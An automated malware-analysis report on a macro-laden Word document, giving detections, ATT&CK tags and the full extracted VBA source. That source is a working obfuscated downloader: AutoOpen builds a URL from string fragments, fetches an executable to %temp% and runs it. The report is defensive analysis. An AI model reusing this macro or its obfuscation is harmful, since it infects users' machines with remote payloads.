Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e4a55ca42d2ee70d…

MALICIOUS

Office (OLE)

63.5 KB Created: 2017-02-08 14:04:00 Authoring application: Microsoft Office Word First seen: 2017-05-03
MD5: df8fb3bdf550e78e59988c3499e84abe SHA-1: 68db71fc0b82e860c1c77c2039270d1b3135bba1 SHA-256: e4a55ca42d2ee70d0a45aa3d0cc37cb16c2fa68467d956cd50d13096058c42c6
278 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1204.002 Malicious File T1071.001 Web Protocols

The sample is a malicious Office document containing VBA macros. The document body suggests a lure to enable macros for conversion. The VBA code references the URLDownloadToFile API, indicating it likely downloads and executes a second-stage payload. The presence of legacy WordBasic auto-exec markers and VBA macros points to a macro-based downloader.

Heuristics 9

  • ClamAV: Doc.Dropper.Agent-5760036-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-5760036-0
  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    Private Declare PtrSafe Function ograk Lib "netapi32" (ByVal yref As Boolean, ByVal rybhy As Long, ByVal uzxexobv As Currency, ByVal darhexcu As Single, ByVal juwvyv As Variant, ByVal yhsovpiw As String, ByVal wsaxmi As Object, ByVal ubomi As String, ByVal ezxytopl As String, ByVal gadi As Long) As String
Private Declare PtrSafe Function aloba Lib "urlmon" Alias "URLDownloadToFileA" (ByVal igilnet As Long, ByVal linyb As String, ByVal vumume As String, ByVal icykzi As Long, ByVal jcaxfyrxo As Long) As Long
Private Declare PtrSafe Function lvosdave Lib "gdi32" Alias "rxozig" (ByVal fwinizj As Object, ByVal wehy As Boolean, ByVal zcomeczy As Object, ByVal tninowl As Variant, ByVal qqopuse As String, ByVal eguti As Double, ByVal tega As Object) As Variant
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
dxyki = "phaseguks"
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
     Else
  amyw = Environ(odganfy()) & fogkowp6()
ezus = aloba(tosduz, pzydfihe(), amyw, tosduz, tosduz)
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6699 bytes
SHA-256: 2ca498cfc0338561a892d2b2302e32d3be6f59c39e1799f7fe611d63f11ed7e1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare PtrSafe Function dpapxobte Lib "netapi32" (ByVal nzylfyf As Long, ByVal micoq As Long, ByVal imbazziwg As Integer, ByVal ityb As Double, ByVal ipakha As Integer, ByVal aczywex As Variant, ByVal ahfeqsav As Double, ByVal utxobo As Single, ByVal ohyl As Double)
Private Declare PtrSafe Function mlymqa Lib "advapi32" (ByVal nuvyf As Variant, ByVal ititrefr As Currency, ByVal akadl As Integer, ByVal suzolo As Currency, ByVal ympucuf As Byte)
Private Declare PtrSafe Function pufxis Lib "netapi32" Alias "bcevigu" (ByVal vukkyra As Double, ByVal idxumm As Currency, ByVal ydobiwg As Integer, ByVal sgujfi As Object, ByVal yvlevf As Byte, ByVal zfokkabte As Long, ByVal fserfimy As Single, ByVal ukubpa As String, ByVal leguk As Double, ByVal piber As Long, ByVal ascemvuhx As Single)
Private Declare PtrSafe Function ewezm Lib "netapi32" Alias "resadokr" (ByVal kicy As Single, ByVal ukufg As Variant) As Boolean
Private Declare PtrSafe Function dosvacf Lib "gdi32" Alias "awybjig" (ByVal norriql As Byte, ByVal exfos As Variant, ByVal powvewse As Currency, ByVal uqeru As Double, ByVal wudi As Currency) As Integer
Private Declare PtrSafe Function usmysi Lib "netapi32" (ByVal hacaj As Currency, ByVal exduqgi As Double, ByVal cogtazi As Currency)
Private Declare PtrSafe Function ograk Lib "netapi32" (ByVal yref As Boolean, ByVal rybhy As Long, ByVal uzxexobv As Currency, ByVal darhexcu As Single, ByVal juwvyv As Variant, ByVal yhsovpiw As String, ByVal wsaxmi As Object, ByVal ubomi As String, ByVal ezxytopl As String, ByVal gadi As Long) As String
Private Declare PtrSafe Function aloba Lib "urlmon" Alias "URLDownloadToFileA" (ByVal igilnet As Long, ByVal linyb As String, ByVal vumume As String, ByVal icykzi As Long, ByVal jcaxfyrxo As Long) As Long
Private Declare PtrSafe Function lvosdave Lib "gdi32" Alias "rxozig" (ByVal fwinizj As Object, ByVal wehy As Boolean, ByVal zcomeczy As Object, ByVal tninowl As Variant, ByVal qqopuse As String, ByVal eguti As Double, ByVal tega As Object) As Variant
Private Declare PtrSafe Function pyfe Lib "netapi32" (ByVal fnydoj As Byte, ByVal alzurwumq As Double, ByVal thilzodg As Currency, ByVal priqajx As Variant, ByVal izet As Single, ByVal yznuna As Integer, ByVal quru As String, ByVal zwycdusd As Integer, ByVal yjidu As Integer) As Object
Private Declare PtrSafe Function uvgada Lib "gdi32" (ByVal bigoxti As Single, ByVal ikuvmirk As Variant, ByVal pesjipzi As Byte, ByVal sazlogba As Long, ByVal azlajusp As String)
Private Declare PtrSafe Function iqegydj Lib "shell32.dll" Alias "ShellExecuteA" (ByVal erpometj As LongPtr, ByVal xiqizpy As String, ByVal lzocu As String, ByVal jypqokge As String, ByVal xawo As String, ByVal nlopo As Long) As LongPtr
Function ukcafc()
nqeksevacxibjuvofryvbavodiv = 2726
ukcafc = "tem"
End Function

Function bsuqumxo()
ssitnaddunpigazupocidhizxi = 2756
bsuqumxo = "p"
End Function

Function hpemte()
nefzorlosaqbydpifuqnajfashoxenki = 2521
hpemte = "\q"
End Function

Function ovugca()
mcehkiqxedxajokfavyxywozvugawy = 2475
ovugca = "no"
End Function

Function insace()
aqabywxudxovohqefzybehkekpyl = 2810
insace = "lg"
End Function

Function idyxn()
azjuttacmywnyzudagcipysubov = 2317
idyxn = "uv"
End Function

Function wosax()
efagivlyfhonlabluvmolorus = 2246
wosax = ".e"
End Function

Function ynusalp()
iwerrecwarkizqufowojetur = 2860
ynusalp = "xe"
End Function

Function oximbi()
celofidyhubneturgohachon = 2015
oximbi = "ht"
End Function

Function kahibjonx()
opgagqyfegeknytgenvesokoqpu = 2839
kahibjonx = "tp"
End Function

Function kypa()
zrixetmycgyfnajkusqasejesi = 2962
kypa = ":/"
End Function

Function uzegalo()
ycresqizsammypupxeckeppuqija = 2067
uzegalo = "/c"
End Function

Function adapzer()
knurlefipvewxujvykypohgyxpi = 2376
adapzer = "xn"
End Function

Function graxuwpyk()
uwjiqokowzonwewhidbolifguqcakofk = 2869
graxuwpyk = "jd"
End Function

Function ijbonjuzdy()
rohtydjisisuctejpippyncovyqna = 2990
ijbonjuzdy = "fh"
End Function

Function ukic()
gerdibiddycwoxnohasducahyli = 2385
ukic = ".t"
End Function

Function pymabr()
dysolyljumewsohotovelpaxukfu = 2912
pymabr = "op"
End Function

Function upbusib()
proqcikkitorelelbakojexyvpuha = 2687
upbusib = "/o"
End Function

Function ilanpyz()
azegjozissylrecryfponorwunxecevb = 2247
ilanpyz = "ff"
End Function

Function mfovnecyq()
ewevqaxnutnyzanwiwpufemusok = 2598
mfovnecyq = "ic"
End Function

Function agxij()
extuknavqabtadukypurcakzuso = 2557
agxij = "em"
End Function

Function ceqesn()
yhabvoxixarpegjamojketacjodec = 2566
ceqesn = "gm"
End Function

Function jqapkywke()
wberihimqohoqfusehamrepeqyzg = 2189
jqapkywke = "te"
End Function

Function csalruw()
ylmesezrelgastinmiddarombidgaft = 2047
csalruw = ".e"
End Function

Function evygt()
lyqyfwijanesytazyxelywu = 2638
evygt = "xe"
End Function

Function odganfy()
yrivni = "zmuxmevyz"
odganfy = ukcafc() & bsuqumxo()
End Function

Function fogkowp6()
axmopwu = "cixucxifyss"
fogkowp6 = hpemte() & ovugca() & insace() & idyxn() & wosax() & ynusalp()
End Function

Function pzydfihe()
ywyj = "jnyjoccecfoj"
pzydfihe = oximbi() & kahibjonx() & kypa() & uzegalo() & adapzer() & graxuwpyk() & ijbonjuzdy() & ukic() & pymabr() & upbusib() & ilanpyz() & mfovnecyq() & agxij() & ceqesn() & jqapkywke() & csalruw() & evygt()
End Function

Sub AutoOpen()
dxyki = "phaseguks"
tosduz = 0
mhumcefj = "hiwim"
yqeg = "52200"
ylisxo = "yrwa"
liju = "open"
fboso = True
ralo = ""
ujel = "40945"
dmazma = "93328"
yhrap = "boweb"
civry = "bilbizrysv"
acygj = "recubib"
ytjujy = "88050"
If (ytjujy = "ldinqubocp") Then
If (TypeName(fboso) = "Boolean") Then
uwajy = "ehdiw"
ukirer = "14666" + dmazma & uwajy & "epop" + "34613"
yhagcevn = "41055"
quholca = "7380" & yhagcevn + ylisxo + acygj
End If
arkivekqu = "ebiburde"
If (arkivekqu = undefined) Then
olohwerak = Empty
ngyquztu = True
anzumm = "76760"
devo = anzumm & "75379"
xokaluk = 10
ujezonl = 38
ifyw = "76814"
vozwafu = mhumcefj + ifyw & dxyki & yhrap + civry
ozimrus = "lenl"
wyqi = yqeg + ozimrus & ujel

End If

 Else
  amyw = Environ(odganfy()) & fogkowp6()
ezus = aloba(tosduz, pzydfihe(), amyw, tosduz, tosduz)
If ezus = 0 Then
hywda = iqegydj(tosduz, liju, amyw, ralo, ralo, tosduz)
End If
 
End If

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.